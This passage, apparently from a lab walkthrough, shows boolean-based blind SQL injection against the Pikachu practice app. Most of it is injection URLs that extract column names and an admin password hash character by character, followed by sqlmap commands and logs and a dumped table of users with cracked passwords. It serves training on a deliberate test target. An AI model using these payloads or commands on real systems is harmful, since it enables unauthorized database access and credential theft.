http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1)) = 8) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 8
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 1, 1) = 'p') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 2, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 3, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 4, 1) = 's') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 5, 1) = 'w') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 6, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 7, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名: password
列 3: password
[*] 正在探测表 users 的第 4 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 1, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 3, 1) = 'v') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 4, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名: level
列 4: level
(4) Probing data
Next, probe the first row of the users table. As shown below, the username is admin and the stored password is the MD5 value e10adc3949ba59abbe56e057f20f883e, from which the password can be inferred to be 123456.
[*] 开始提取 users.id 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT id FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT id FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 提取完成: 1
4: 1
[*] 开始提取 users.username 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 5 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 1, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 4, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 提取完成: admin
4: admin
[*] 开始提取 users.password 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT password FROM users LIMIT 0,1)) = 32) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 32 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 1, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 2, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 3, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 5, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 6, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 7, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 8, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 9, 1) = '4') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 10, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 11, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 12, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 13, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 14, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 15, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 16, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 17, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 18, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 19, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 20, 1) = '6') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 21, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 22, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 23, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 24, 1) = '7') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 25, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 26, 1) = '2') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 27, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 28, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 29, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 30, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 31, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 32, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] Extraction complete: e10adc3949ba59abbe56e057f20f883e
4: e10adc3949ba59abbe56e057f20f883e
[*] Starting extraction of row 1 of users.level
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT level FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] Data length: 1 character
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT level FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] Extraction complete: 1
4: 1
3、sqlmap exploitation
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump
When this command is run, sqlmap only finds a time-based injection technique; the output is shown below.
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: name (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=mooyuan' AND (SELECT 7670 FROM (SELECT(SLEEP(5)))vJLD) AND 'Zxcy'='Zxcy&submit=%E6%9F%A5%E8%AF%A2
If the --technique=B option is added, the scan cannot proceed at all and reports that no parameter is injectable, as shown below.
[05:20:51] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mn9mirug87r...aprvlnnef7'). Do you want to use those [Y/n] Y
[05:20:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:20:52] [INFO] testing if the target URL content is stable
[05:20:52] [INFO] target URL content is stable
[05:20:52] [INFO] testing if GET parameter 'name' is dynamic
[05:20:53] [WARNING] GET parameter 'name' does not appear to be dynamic
[05:20:53] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[05:20:53] [INFO] testing for SQL injection on GET parameter 'name'
[05:20:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:55] [WARNING] GET parameter 'name' does not seem to be injectable
[05:20:55] [INFO] testing if GET parameter 'submit' is dynamic
[05:20:55] [WARNING] GET parameter 'submit' does not appear to be dynamic
[05:20:55] [WARNING] heuristic (basic) test shows that GET parameter 'submit' might not be injectable
[05:20:55] [INFO] testing for SQL injection on GET parameter 'submit'
[05:20:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:59] [WARNING] GET parameter 'submit' does not seem to be injectable
[05:20:59] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[05:20:59] [WARNING] your sqlmap version is outdated
This is because, for boolean-based blind injection, sqlmap has to tell True responses from False ones by comparing page content, and here it cannot work that out on its own. Telling it explicitly with --not-string (the string that appears only in a False response, here the "不存在" message) lets the boolean-based test succeed. The full command is as follows.
sqlmap -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump --technique=B --not-string="不存在"
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 13 HTTP(s) requests:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=mooyuan' AND 7085=7085 AND 'XcNF'='XcNF&submit=%E6%9F%A5%E8%AF%A2
---
Database: pikachu
Table: users
[3 entries]
+----+---------+-------------------------------------------+----------+
| id | level | password | username |
+----+---------+-------------------------------------------+----------+
| 1 | 1 | e10adc3949ba59abbe56e057f20f883e (123456) | admin |
| 2 | 2 | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu |
| 3 | 3 | e99a18c428cb38d5f260853678922e03 (abc123) | test |
+----+---------+-------------------------------------------+----------+